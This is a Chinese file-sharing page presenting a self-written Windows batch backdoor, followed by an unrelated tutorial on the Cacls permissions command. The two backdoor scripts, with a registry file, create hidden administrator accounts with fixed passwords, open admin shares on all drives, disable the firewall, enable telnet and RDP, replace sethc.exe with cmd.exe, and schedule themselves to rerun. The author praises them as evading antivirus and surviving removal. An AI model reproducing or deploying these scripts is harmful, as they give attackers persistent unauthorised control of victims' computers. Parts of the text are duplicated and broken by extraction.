自己写的一个批处理系统后门自己写的一个批处理系统后门
自己写的一个批处理系统后门
@echo off rem==把本批处理文件和注册表文件属性设置为系统只读隐藏
attrib+s+r+h Backdoor.bat attrib+s+r+h Open3389.reg rem===把本批
处理文件和注册表文件拷贝到系统目录下
copy/y c:\windows\system32\Backdoor.bat copy/y c:
\winnt\system32\Backdoor.bat copy/y c:\windows\system32\Open338...
自己写的一个批处理系统后门
自己写的一个批处理系统后门
@echo off rem==把本批处理文件和注册
文件属性设置为系统只读隐藏
attrib+s+r+h Backdoor.bat attrib+s+r+h Open3389.reg rem===把本批
处理文件和注册表文件拷贝到系统目录下
copy/y c:\windows\system32\Backdoor.bat copy/y c:
\winnt\system32\Backdoor.bat copy/y c:\windows\system32\Open3389.reg copy/y c:\windows\system32\Open3389.reg rem===创建名字和密码为
hackwang的隐藏用户,并提升为管理权限
net user hackwang$hackwang/add net localgroup administrators
hackwang$/add rem===开启SERVER服务,开启默认共享
sc config lanmanserver start=AUTO net start lanmanserver net
share c$=c:
net share d$=d:
net share e$=e:
net share f$=f:
net share g$=g:
net share h$=h:
rem===关闭
任务。把计划任务设置为自动。开启系统计划任务
net stop schedule sc config schedule start=AUTO net start Schedule rem===在计划任务中添加任务。定时运行本批处理文件
at 10:05 c:\winnt\SYSTEM32\Backdoor.bat at 21:11 c:\winnt\SYSTEM32\Backdoor.bat at 10:05 c:
\windows\SYSTEM32\Backdoor.bat at 21:11 c:
\windows\SYSTEM32\Backdoor.bat rem===关闭系统防火墙
net stop sharedaccess rem===关闭TELNET服务。把TELNET服务设置为自动。开启TELNET服务
net stop telnet sc config Tlntsvr start=AUTO net start telnet
rem===SHIFT键后门
copy/y c:\windows\system32\cmd.exe c:
\windows\system32\sethc.exe copy/y c:\windows\system32\sethc.exe C:
dllcache\sethc.exe rem===导入注册表文件。开启终端\WINDOWS\system32\
3389服务
regedit/s Open3389.reg rem===
@exit
===把Open3389.reg放在和Backdoor.bat同一个目录下===
【Open3389.reg文件内容】
==
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] "PortNumber"=dword:00000D3D
===
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后
门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了,代码如下: @echo off
@attrib+s+r xyt.bat
@net user xyt hacker/add
@net localgroup administrators xyt/add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec=-ntlm @net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat c:
\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat c:
\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYS TEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
命令行下修改文件访问权限
现在越来越多的用户使用NTFS文件系统来增强Windows系统的安全性。通常是在图形用户界面(GUI)的"安全"选项卡中对文件或目录访问控制权限进行设置。还有一种设置方式大家可能很少使用,这就是Cacls命令,虽然它是一个基于命令行的命令,使用起来有点繁琐,但只要你合理利用,也会在提高系统安全性方面起到很好的效果。Cacls命令使用格式如下:
Cacls filename[/T][/E][/C][/G user:perm][/R user[.]][/P user:perm[.]][/D user[.]]
Filename--显示访问控制列表(以下简称ACL);
/T--更改当前目录及其所有子目录中指定文件的ACL;
/E--编辑ACL而不替换;
/C--在出现拒绝访问错误时继续;
/G user:perm--赋予指定用户访问权限。Perm可以是R(读取)、W(写入)、C(更改,写入)、F(完全控制);
/R user--撤销指定用户的访问权限(仅在与/E一起使用);
/P user:perm--替换指定用户的访问权限;
/D user--拒绝指定用户的访问。
1.查看目录和ACL
以Windows XP系统为例,笔者使用Cacls命令查看E盘CCE目录访问控制权限。点击"开始?运行",在运行对话框中输入"CMD"命令,弹出命令提示符对话框,在"E:\"提示符下输入"Cacls CCE"命令,接着就会列出Windows XP系统中用户组和用户对CCE目录的访问控制权限项目。如果想查看CCE目录中所有文件访问控制权限,输入"Cacls cce\."命令即可。
2.修改目录和ACL
设置用户访问权限:我们经常要修改目录和文件的访问权限,使用Cacls命令就很容易做到。下面要赋予本机用户Chenfeng对E盘下CCE目录及其所有子目录中的文件有完全控制权限。在命令提示符对话框中输入"Cacls CCE/t/e/c/g Chenfeng:f"命令即可。
替换用户访问权限:将本机用户Chenfeng的完全控制权限替换为只读权限。在命令提示符对话框中输入"Cacls CCE/t/e/c/p Chenfeng:r"命令即可。
撤销用户访问权限:要想撤销本机用户Chenfeng对该目录的完全控制权限也很容易,在命令提示符中运行"Cacls CCE/t/e/c/r Chenfeng"即可。
拒绝用户访问:要想拒绝用户Chenfeng访问CCE目录及其所有子目录中的文件,运行"Cacls CCE/t/e/c/d Chenfeng"即可。
我最近在玩和讯微博,很方便,很实用,你也来和我一起玩吧~
去看看我的微博吧~
本文档为【自己写的一个批处理系统后门】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑,
图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。